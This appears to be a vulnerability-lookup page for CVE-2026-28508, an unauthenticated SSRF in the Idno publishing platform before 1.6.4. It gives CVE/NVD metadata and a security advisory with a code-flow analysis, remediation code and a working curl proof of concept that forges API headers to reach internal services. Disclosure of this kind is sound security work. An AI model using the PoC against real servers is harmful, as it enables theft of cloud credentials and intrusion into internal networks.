Vulnerability-Lookup

CVE-2026-28508 (GCVE-0-2026-28508)

Vulnerability from cvelistv5 – Published: 2026-03-06 04:13 – Updated: 2026-03-06 16:07

Title

Idno: Unauthenticated SSRF via URL Unfurl Endpoint

Summary

Idno is a social publishing platform. Prior to version 1.6.4, a logic error in the API authentication flow causes the CSRF protection on the URL unfurl service endpoint to be trivially bypassed by any unauthenticated remote attacker. Combined with the absence of a login requirement on the endpoint itself, this allows an attacker to force the server to make arbitrary outbound HTTP requests to any host, including internal network addresses and cloud instance metadata services, and retrieve the response content. This issue has been patched in version 1.6.4.

Severity ?

9.2 (Critical)


                        
                          CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N

CWE

CWE-918 - Server-Side Request Forgery (SSRF)

Assigner

GitHub_M

References

URL

Tags

	https://github.com/idno/idno/security/advisories/…	x_refsource_CONFIRM
	https://github.com/idno/idno/releases/tag/1.6.4	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	idno	idno	Affected: < 1.6.4

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-28508",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-06T16:00:20.241576Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-06T16:07:56.001Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "idno",
          "vendor": "idno",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 1.6.4"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Idno is a social publishing platform. Prior to version 1.6.4, a logic error in the API authentication flow causes the CSRF protection on the URL unfurl service endpoint to be trivially bypassed by any unauthenticated remote attacker. Combined with the absence of a login requirement on the endpoint itself, this allows an attacker to force the server to make arbitrary outbound HTTP requests to any host, including internal network addresses and cloud instance metadata services, and retrieve the response content. This issue has been patched in version 1.6.4."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 9.2,
            "baseSeverity": "CRITICAL",
            "privilegesRequired": "NONE",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "HIGH",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "NONE"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-918",
              "description": "CWE-918: Server-Side Request Forgery (SSRF)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-06T04:13:19.621Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/idno/idno/security/advisories/GHSA-fcrh-fqxh-6fx6",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/idno/idno/security/advisories/GHSA-fcrh-fqxh-6fx6"
        },
        {
          "name": "https://github.com/idno/idno/releases/tag/1.6.4",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/idno/idno/releases/tag/1.6.4"
        }
      ],
      "source": {
        "advisory": "GHSA-fcrh-fqxh-6fx6",
        "discovery": "UNKNOWN"
      },
      "title": "Idno: Unauthenticated SSRF via URL Unfurl Endpoint"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-28508",
    "datePublished": "2026-03-06T04:13:19.621Z",
    "dateReserved": "2026-02-27T20:57:47.709Z",
    "dateUpdated": "2026-03-06T16:07:56.001Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-28508",
      "date": "2026-04-26",
      "epss": "0.00193",
      "percentile": "0.41059"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-28508\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-06T05:16:35.233\",\"lastModified\":\"2026-03-16T14:03:38.950\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Idno is a social publishing platform. Prior to version 1.6.4, a logic error in the API authentication flow causes the CSRF protection on the URL unfurl service endpoint to be trivially bypassed by any unauthenticated remote attacker. Combined with the absence of a login requirement on the endpoint itself, this allows an attacker to force the server to make arbitrary outbound HTTP requests to any host, including internal network addresses and cloud instance metadata services, and retrieve the response content. This issue has been patched in version 1.6.4.\"},{\"lang\":\"es\",\"value\":\"Idno es una plataforma de publicaci\u00f3n social. Antes de la versi\u00f3n 1.6.4, un error l\u00f3gico en el flujo de autenticaci\u00f3n de la API provoca que la protecci\u00f3n CSRF en el endpoint del servicio de expansi\u00f3n de URL sea trivialmente eludida por cualquier atacante remoto no autenticado. Combinado con la ausencia de un requisito de inicio de sesi\u00f3n en el propio endpoint, esto permite a un atacante forzar al servidor a realizar solicitudes HTTP salientes arbitrarias a cualquier host, incluyendo direcciones de red internas y servicios de metadatos de instancias en la nube, y recuperar el contenido de la respuesta. Este problema ha sido parcheado en la versi\u00f3n 1.6.4.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":9.2,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"HIGH\",\"vulnIntegrityImpact\":\"NONE\",\"vulnAvailabilityImpact\":\"NONE\",\"subConfidentialityImpact\":\"HIGH\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N\",\"baseScore\":8.6,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":4.0}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-918\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:withknown:known:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"1.6.4\",\"matchCriteriaId\":\"03C6A2FD-591E-4396-B7DF-AFE37782951B\"}]}]}],\"references\":[{\"url\":\"https://github.com/idno/idno/releases/tag/1.6.4\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\",\"Release Notes\"]},{\"url\":\"https://github.com/idno/idno/security/advisories/GHSA-fcrh-fqxh-6fx6\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-28508\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-06T16:00:20.241576Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-06T16:00:21.792Z\"}}], \"cna\": {\"title\": \"Idno: Unauthenticated SSRF via URL Unfurl Endpoint\", \"source\": {\"advisory\": \"GHSA-fcrh-fqxh-6fx6\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 9.2, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"CRITICAL\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"NONE\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"HIGH\", \"vulnConfidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"idno\", \"product\": \"idno\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 1.6.4\"}]}], \"references\": [{\"url\": \"https://github.com/idno/idno/security/advisories/GHSA-fcrh-fqxh-6fx6\", \"name\": \"https://github.com/idno/idno/security/advisories/GHSA-fcrh-fqxh-6fx6\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/idno/idno/releases/tag/1.6.4\", \"name\": \"https://github.com/idno/idno/releases/tag/1.6.4\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Idno is a social publishing platform. Prior to version 1.6.4, a logic error in the API authentication flow causes the CSRF protection on the URL unfurl service endpoint to be trivially bypassed by any unauthenticated remote attacker. Combined with the absence of a login requirement on the endpoint itself, this allows an attacker to force the server to make arbitrary outbound HTTP requests to any host, including internal network addresses and cloud instance metadata services, and retrieve the response content. This issue has been patched in version 1.6.4.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-918\", \"description\": \"CWE-918: Server-Side Request Forgery (SSRF)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-06T04:13:19.621Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-28508\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-06T16:07:56.001Z\", \"dateReserved\": \"2026-02-27T20:57:47.709Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-06T04:13:19.621Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-FCRH-FQXH-6FX6

Vulnerability from github – Published: 2026-03-02 21:24 – Updated: 2026-03-06 15:16

Summary

Idno Vulnerable to Unauthenticated SSRF via URL Unfurl Endpoint

Details

Summary

A logic error in the API authentication flow causes the CSRF protection on the URL unfurl service endpoint to be trivially bypassed by any unauthenticated remote attacker. Combined with the absence of a login requirement on the endpoint itself, this allows an attacker to force the server to make arbitrary outbound HTTP requests to any host, including internal network addresses and cloud instance metadata services, and retrieve the response content.

Component: Idno/Pages/Service/Web/UrlUnfurl.php, Idno/Core/Session.php, Idno/Core/Actions.php
Vulnerability Class: Server-Side Request Forgery (SSRF) Authentication Required: None
CVSSv4 Base Score: 9.2 (High) - AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N Affected Endpoint: GET /service/web/unfurl?url=<attacker-controlled-url> Handled by Idno\Pages\Service\Web\UrlUnfurl::getContent(). Affected Versions: <= 1.6.3

cat version.idno
version = '1.6.3'
build = 2026021301

Code Flow

Step 1 — Endpoint access control

UrlUnfurl::getContent() (UrlUnfurl.php:36) enforces two access controls:
$this->xhrGatekeeper(); $this->tokenGatekeeper();

Notably, the original authentication check ($this->gatekeeper()) was explicitly removed with the following comment left in the source:

//$this->gatekeeper(); // Gatekeeper to ensure this service isn't abused by third parties
// UPDATE: Needs to be accessible to logged out users, TODO, find a way to prevent abuse

This leaves the endpoint accessible to unauthenticated users, with only the two remaining gatekeepers as a barrier.

Step 2 — Bypassing xhrGatekeeper()

Page::xhrGatekeeper() (Page.php:876) checks whether the request was made with the X-Requested-With: XMLHttpRequest header:

function xhrGatekeeper()
{
    if (!$this->xhr) {
        $this->deniedContent();
    }
}

This check is trivially bypassed by any HTTP client capable of setting custom headers.

Step 3 — Bypassing `tokenGatekeeper()` via premature API flag

Page::tokenGatekeeper() (Page.php:887) calls Actions::validateToken():

function tokenGatekeeper()
{
    $url = $this->currentUrl();
    $bits = explode('?', $url);
    $url = $bits[0];
    if (!\Idno\Core\Idno::site()->actions()->validateToken($url, false)) {
        $this->deniedContent();
    }
}

Actions::validateToken() (Actions.php:23) short-circuits entirely when isAPIRequest() returns true:

public static function validateToken($action = '', $haltExecutionOnBadRequest = true)
{
    if (Idno::site()->session()->isAPIRequest()) {
        return true;
    }
    return parent::validateToken($action, $haltExecutionOnBadRequest);
}

isAPIRequest() reads the is_api_request flag from the session:

function isAPIRequest()
{
    if (!empty($_SESSION['is_api_request'])) {
        return true;
    }
    return false;
}

The flag is set in Session::tryAuthUser() (Session.php:488), which runs early in the request lifecycle. The critical defect is here:

$apiUsername  = $_SERVER['HTTP_X_IDNO_USERNAME']  ?? $_SERVER['HTTP_X_KNOWN_USERNAME']  ?? null;
$apiSignature = $_SERVER['HTTP_X_IDNO_SIGNATURE'] ?? $_SERVER['HTTP_X_KNOWN_SIGNATURE'] ?? null;
if (!$return && !empty($apiUsername) && !empty($apiSignature)) {
    $this->setIsAPIRequest(true);   // ← flag set here, before any credential check
    $user = \Idno\Entities\User::getByHandle($apiUsername);
    if (!empty($user)) {
        $compare_hmac = base64_encode(hash_hmac('sha256', $_SERVER['REQUEST_URI'], $key, true));
        if ($hmac == $compare_hmac) {       // ← HMAC verified here, too late
            $return = $this->refreshSessionUser($user);
        }
    }
}

setIsAPIRequest(true) is called unconditionally as soon as both X-IDNO-USERNAME and X-IDNO-SIGNATURE headers are present, regardless of whether the supplied credentials are valid. The HMAC verification that follows is therefore irrelevant — by the time tokenGatekeeper() calls validateToken(), the API flag is already set and the token check returns true immediately.

An attacker supplying any non-empty values for these two headers — real or fabricated — bypasses CSRF protection entirely.

Step 4 — The unfurl fetch

With both gatekeepers bypassed, execution reaches UnfurledUrl::unfurl() (UnfurledUrl.php:53):

public function unfurl($url)
{
    $url = trim($url);
    if (!filter_var($url, FILTER_VALIDATE_URL)) {
        return false;
    }
    $contents = \Idno\Core\Webservice::file_get_contents($url);
    ...
    $this->data = $unfurled;
    $this->source_url = $url;
    return true;
}

FILTER_VALIDATE_URL accepts any valid URL including http://localhost/, http://169.254.169.254/, and http://10.0.0.1/. There is no allowlist, blocklist, or restriction on private/loopback address ranges. The fetched content is parsed for OpenGraph metadata and mf2 microformats, then returned to the caller in a JSON response, giving the attacker a full read of the response body from the internal target.

Proof of Concept

Step 1: Run a webserver on the server running Idno to emulate an internal service. Ensure this server is not accessible localhost.

python -m http.server --bind 127.0.0.1 9001
Serving HTTP on 127.0.0.1 port 9001 (http://127.0.0.1:9001/) ...

Step 2: Verify that you cannot reach this server from a different system

curl http://rpi:9001
curl: (7) Failed to connect to rpi port 9001 after 26 ms: Couldn't connect to server

Step 3: Make a request to the unfurl URL with required headers and observe that you can reach the internal service.

curl -s "http://rpi:9090/service/web/unfurl?url=http://localhost:9001/test.html" \
    -H "X-Requested-With: XMLHttpRequest" \
    -H "X-IDNO-USERNAME: x" \
    -H "X-IDNO-SIGNATURE: x"
{
    "title": "Page Title",
    "mf2": {
        "items": [],
        "rels": [],
        "rel-urls": []
    },
    "id": null,
    "rendered": "<div class=\"row unfurled-url\" id=\"unfurled-url-\" data-url=\"http:\/\/localhost:9001\/test.html\">\n    <div class=\"basics\">\n                    \n            <div class=\"text\">\n                <h3><a href=\"http:\/\/localhost:9001\/test.html\" target=\"_blank\">Page Title<\/a><\/h3>\n                \n                <!--<div class=\"byline\"><a href=\"http:\/\/localhost:9001\/test.html\">localhost<\/a><\/div>-->\n            <\/div>\n    <\/div>\n    \n    <\/div>"
}

https://github.com/user-attachments/assets/6b8c7728-94e3-4b5e-ba7f-c0908e75d08c

Impact

Any unauthenticated remote attacker can force the server to issue HTTP requests to arbitrary destinations and retrieve response content. Practical attack scenarios include: * Cloud instance metadata exfiltration (AWS, GCP, Azure): The SSRF can reach the instance metadata service. On AWS with IMDSv1 (the default prior to late 2019 and still common on older instances), this exposes temporary IAM credentials, which can be used to gain full access to the associated cloud account. On GCP and Azure equivalent endpoints expose OAuth tokens and subscription details.

Internal network reconnaissance: The attacker can probe internal hosts and ports by observing response content and timing differences. Open ports responding to HTTP return content; ports with no HTTP listener produce an error or timeout. This allows mapping of internal services (databases, caches, admin panels, other web applications) that are not exposed to the public internet.
Access to localhost-restricted services: Web applications and administration interfaces commonly restrict access to 127.0.0.1. The SSRF bypasses this restriction by routing requests through the server itself. This includes Idno's own admin interface if it is firewall-restricted, as well as co-located services such as database administration tools, monitoring dashboards, and internal APIs.
Interaction with internal services Services such as Redis (default: no authentication), Memcached, and internal HTTP APIs may be reachable and manipulable via crafted URLs, potentially enabling cache poisoning, data exfiltration, or triggering state-changing operations on internal systems.

Remediation

Move setIsAPIRequest(true) to after successful HMAC verification:

if ($hmac == $compare_hmac) {
    $this->setIsAPIRequest(true);   // only set after credentials are verified
    $return = $this->refreshSessionUser($user);
}

Defence in depth — block private address ranges in unfurl(): The unfurl function should reject requests to RFC 1918 addresses, loopback, and link-local ranges:

$host = parse_url($url, PHP_URL_HOST);
if (filter_var($host, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
    // allowed
} else {
    return false; // block private/reserved ranges
}

Note: An attempt was made to email the address provided in the security page but the address does not exist.

Your message wasn't delivered to security@idno.co because the address couldn't be found, or is unable to receive mail.

Severity ?

9.2 (Critical)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.6.3"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "idno/known"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.6.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-28508"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-02T21:24:37Z",
    "nvd_published_at": "2026-03-06T05:16:35Z",
    "severity": "CRITICAL"
  },
  "details": "## Summary\nA logic error in the API authentication flow causes the CSRF protection on the URL unfurl service endpoint to be trivially bypassed by any unauthenticated remote attacker. Combined with the absence of a login requirement on the endpoint itself, this allows an attacker to force the server to make arbitrary outbound HTTP requests to any host, including internal network addresses and cloud instance metadata services, and retrieve the response content.\n\n**Component**: `Idno/Pages/Service/Web/UrlUnfurl.php`, `Idno/Core/Session.php`, `Idno/Core/Actions.php`  \n**Vulnerability Class**: [Server-Side Request Forgery (SSRF)](https://cwe.mitre.org/data/definitions/918.html)\n**Authentication Required**: None  \n**CVSSv4 Base Score:** 9.2 (High) - [AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N](https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N)\n**Affected Endpoint**: GET `/service/web/unfurl?url=\u003cattacker-controlled-url\u003e`\nHandled by `Idno\\Pages\\Service\\Web\\UrlUnfurl::getContent()`.\n**Affected Versions**: \u003c= 1.6.3\n```\ncat version.idno\nversion = \u00271.6.3\u0027\nbuild = 2026021301\n```\n\n\n## Code Flow  \n### Step 1 \u2014 Endpoint access control  \n`UrlUnfurl::getContent()` (UrlUnfurl.php:36) enforces two access controls:  \n`$this-\u003exhrGatekeeper();`\n`$this-\u003etokenGatekeeper();`  \n\nNotably, the original authentication check (`$this-\u003egatekeeper()`) was explicitly removed with the following comment left in the source:\n\n```php\n//$this-\u003egatekeeper(); // Gatekeeper to ensure this service isn\u0027t abused by third parties\n// UPDATE: Needs to be accessible to logged out users, TODO, find a way to prevent abuse\n```\n\nThis leaves the endpoint accessible to unauthenticated users, with only the two remaining gatekeepers as a barrier.\n\n### Step 2 \u2014 Bypassing xhrGatekeeper()\n`Page::xhrGatekeeper()` (Page.php:876) checks whether the request was made with the X-Requested-With:\nXMLHttpRequest header:\n```php\nfunction xhrGatekeeper()\n{\n    if (!$this-\u003exhr) {\n        $this-\u003edeniedContent();\n    }\n}\n```\n\nThis check is trivially bypassed by any HTTP client capable of setting custom headers.\n\n### Step 3 \u2014 Bypassing `tokenGatekeeper()` via premature API flag\n`Page::tokenGatekeeper()` (Page.php:887) calls `Actions::validateToken()`:\n```php\nfunction tokenGatekeeper()\n{\n    $url = $this-\u003ecurrentUrl();\n    $bits = explode(\u0027?\u0027, $url);\n    $url = $bits[0];\n    if (!\\Idno\\Core\\Idno::site()-\u003eactions()-\u003evalidateToken($url, false)) {\n        $this-\u003edeniedContent();\n    }\n}\n```\n`Actions::validateToken()` (Actions.php:23) short-circuits entirely when `isAPIRequest()` returns true:\n\n```php\npublic static function validateToken($action = \u0027\u0027, $haltExecutionOnBadRequest = true)\n{\n    if (Idno::site()-\u003esession()-\u003eisAPIRequest()) {\n        return true;\n    }\n    return parent::validateToken($action, $haltExecutionOnBadRequest);\n}\n```\n`isAPIRequest()` reads the `is_api_request` flag from the session:\n```php\nfunction isAPIRequest()\n{\n    if (!empty($_SESSION[\u0027is_api_request\u0027])) {\n        return true;\n    }\n    return false;\n}\n```\nThe flag is set in `Session::tryAuthUser()` (Session.php:488), which runs early in the request lifecycle. The critical defect is here:\n```php\n$apiUsername  = $_SERVER[\u0027HTTP_X_IDNO_USERNAME\u0027]  ?? $_SERVER[\u0027HTTP_X_KNOWN_USERNAME\u0027]  ?? null;\n$apiSignature = $_SERVER[\u0027HTTP_X_IDNO_SIGNATURE\u0027] ?? $_SERVER[\u0027HTTP_X_KNOWN_SIGNATURE\u0027] ?? null;\nif (!$return \u0026\u0026 !empty($apiUsername) \u0026\u0026 !empty($apiSignature)) {\n    $this-\u003esetIsAPIRequest(true);   // \u2190 flag set here, before any credential check\n    $user = \\Idno\\Entities\\User::getByHandle($apiUsername);\n    if (!empty($user)) {\n        $compare_hmac = base64_encode(hash_hmac(\u0027sha256\u0027, $_SERVER[\u0027REQUEST_URI\u0027], $key, true));\n        if ($hmac == $compare_hmac) {       // \u2190 HMAC verified here, too late\n            $return = $this-\u003erefreshSessionUser($user);\n        }\n    }\n}\n```\n`setIsAPIRequest(true)` is called unconditionally as soon as both `X-IDNO-USERNAME` and `X-IDNO-SIGNATURE` headers are present, regardless of whether the supplied credentials are valid. The HMAC verification that follows is therefore irrelevant \u2014 by the time `tokenGatekeeper()` calls `validateToken()`, the API flag is already set and the token check returns true immediately.  \n\nAn attacker supplying any non-empty values for these two headers \u2014 real or fabricated \u2014 bypasses CSRF protection entirely.\n\n### Step 4 \u2014 The unfurl fetch\nWith both gatekeepers bypassed, execution reaches `UnfurledUrl::unfurl()` (UnfurledUrl.php:53):\n```php\npublic function unfurl($url)\n{\n    $url = trim($url);\n    if (!filter_var($url, FILTER_VALIDATE_URL)) {\n        return false;\n    }\n    $contents = \\Idno\\Core\\Webservice::file_get_contents($url);\n    ...\n    $this-\u003edata = $unfurled;\n    $this-\u003esource_url = $url;\n    return true;\n}\n```\n`FILTER_VALIDATE_URL` accepts any valid URL including http://localhost/, http://169.254.169.254/, and http://10.0.0.1/. There is no allowlist, blocklist, or restriction on private/loopback address ranges.\nThe fetched content is parsed for OpenGraph metadata and mf2 microformats, then returned to the caller in a JSON response, giving the attacker a full read of the response body from the internal target.\n\n## Proof of Concept\nStep 1: Run a webserver on the server running Idno to emulate an internal service. Ensure this server is not accessible localhost.\n```\npython -m http.server --bind 127.0.0.1 9001\nServing HTTP on 127.0.0.1 port 9001 (http://127.0.0.1:9001/) ...\n```\n\nStep 2: Verify that you cannot reach this server from a different system\n```\ncurl http://rpi:9001\ncurl: (7) Failed to connect to rpi port 9001 after 26 ms: Couldn\u0027t connect to server\n```\nStep 3: Make a request to the unfurl URL with required headers and observe that you can reach the internal service.\n```sh\ncurl -s \"http://rpi:9090/service/web/unfurl?url=http://localhost:9001/test.html\" \\\n    -H \"X-Requested-With: XMLHttpRequest\" \\\n    -H \"X-IDNO-USERNAME: x\" \\\n    -H \"X-IDNO-SIGNATURE: x\"\n{\n    \"title\": \"Page Title\",\n    \"mf2\": {\n        \"items\": [],\n        \"rels\": [],\n        \"rel-urls\": []\n    },\n    \"id\": null,\n    \"rendered\": \"\u003cdiv class=\\\"row unfurled-url\\\" id=\\\"unfurled-url-\\\" data-url=\\\"http:\\/\\/localhost:9001\\/test.html\\\"\u003e\\n    \u003cdiv class=\\\"basics\\\"\u003e\\n                    \\n            \u003cdiv class=\\\"text\\\"\u003e\\n                \u003ch3\u003e\u003ca href=\\\"http:\\/\\/localhost:9001\\/test.html\\\" target=\\\"_blank\\\"\u003ePage Title\u003c\\/a\u003e\u003c\\/h3\u003e\\n                \\n                \u003c!--\u003cdiv class=\\\"byline\\\"\u003e\u003ca href=\\\"http:\\/\\/localhost:9001\\/test.html\\\"\u003elocalhost\u003c\\/a\u003e\u003c\\/div\u003e--\u003e\\n            \u003c\\/div\u003e\\n    \u003c\\/div\u003e\\n    \\n    \u003c\\/div\u003e\"\n}\n```\n\n\nhttps://github.com/user-attachments/assets/6b8c7728-94e3-4b5e-ba7f-c0908e75d08c\n\n\n\n## Impact\nAny unauthenticated remote attacker can force the server to issue HTTP requests to arbitrary destinations and retrieve response content. Practical attack scenarios include:\n* Cloud instance metadata exfiltration (AWS, GCP, Azure): The SSRF can reach the instance metadata service. On AWS with IMDSv1 (the default prior to late 2019 and still common on older instances), this exposes temporary IAM\ncredentials, which can be used to gain full access to the associated cloud account. On GCP and Azure\nequivalent endpoints expose OAuth tokens and subscription details.\n\n* Internal network reconnaissance: The attacker can probe internal hosts and ports by observing response content and timing differences. Open ports responding to HTTP return content; ports with no HTTP listener produce an error or timeout. This allows mapping of internal services (databases, caches, admin panels, other web applications) that are not exposed to the public internet.\n\n* Access to localhost-restricted services: Web applications and administration interfaces commonly restrict access to 127.0.0.1. The SSRF bypasses this restriction by routing requests through the server itself. This includes Idno\u0027s own admin interface if it is firewall-restricted, as well as co-located services such as database administration tools, monitoring dashboards, and internal APIs.\n\n* Interaction with internal services\nServices such as Redis (default: no authentication), Memcached, and internal HTTP APIs may be reachable and manipulable via crafted URLs, potentially enabling cache poisoning, data exfiltration, or triggering state-changing operations on internal systems.\n\n\n## Remediation\nMove `setIsAPIRequest(true)` to after successful HMAC verification:\n```php\nif ($hmac == $compare_hmac) {\n    $this-\u003esetIsAPIRequest(true);   // only set after credentials are verified\n    $return = $this-\u003erefreshSessionUser($user);\n}\n```\n\nDefence in depth \u2014 block private address ranges in unfurl():\nThe unfurl function should reject requests to RFC 1918 addresses, loopback, and link-local ranges:\n```php\n$host = parse_url($url, PHP_URL_HOST);\nif 